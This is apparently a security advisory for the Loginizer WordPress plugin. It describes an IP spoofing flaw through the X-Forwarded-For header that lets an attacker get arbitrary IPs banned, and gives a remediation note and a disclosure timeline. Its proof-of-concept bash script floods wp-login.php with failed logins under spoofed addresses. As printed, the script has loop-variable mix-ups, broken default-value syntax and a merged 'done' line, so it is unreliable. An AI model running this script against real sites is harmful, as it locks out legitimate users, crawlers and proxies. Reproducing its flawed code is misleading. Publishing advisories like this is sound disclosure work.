| Affected plugin | Loginizer |
| Active installs | 1+ million |
| Vulnerable version | <= 1.7.3 |
| Audited version | 1.7.3 |
| Fully patched version | – |
| Recommended remediation | Removal of the plugin |
Description
An attacker can exploit IP spoofing vulnerabilities to ban search-engine crawlers, the site’s reverse proxy, or legitimate users.
This attack is possible if a user configures the plugin to use a different IP source than REMOTE_ADDR.
Proof of concept
Configure the plugin to use the HTTP_X_FORWARDED_FOR header.
Run the following bash script.
#!/usr/bin/env bash
# ban-random-ips.sh
TARGET_DOMAIN="$1"
TOTAL_IPS="${2:-100}"
SLEEP="$3:0.1"
REAL_USER_IP=147.93.33.75
for ((ips=1; i <= TOTAL_IPS; ips++))
do
IP=$(printf "%d.%d.%d.%d\n" "$((RANDOM % 256))" "$((RANDOM % 256))" "$((RANDOM % 256))" "$((RANDOM % 256))")
for (( i = 0; i < 4; i++ )); do
curl -s -X POST "https://$TARGET_DOMAIN/wp-login.php" \
-H "X-Forwarded-For: $IP, $REAL_USER_IP" \
-d "log=admin" \
-d "pwd=foo" > /dev/null
sleep "$SLEEP"
echo "$i - $IP"
done
donebash ban-random-ips.sh target-site.com 100Now, go to the plugin’s dashboard:
The plugin banned 70 different IP addresses. However, the attacker’s IP address is not banned. (Click to see image)
==> This proves that the plugin is vulnerable to IP spoofing.
The vulnerable function is called lz_getip.
Proposed patch
This is described in great length in this article of us.
Summary: Only ever use REMOTE_ADDR to access to current IP.
Timeline
| Vendor contacted | September 11, 2022 |
| First Response | – |
| Fully patched at | – |
| Publicly disclosed | April 24, 2023 |
Leave a Reply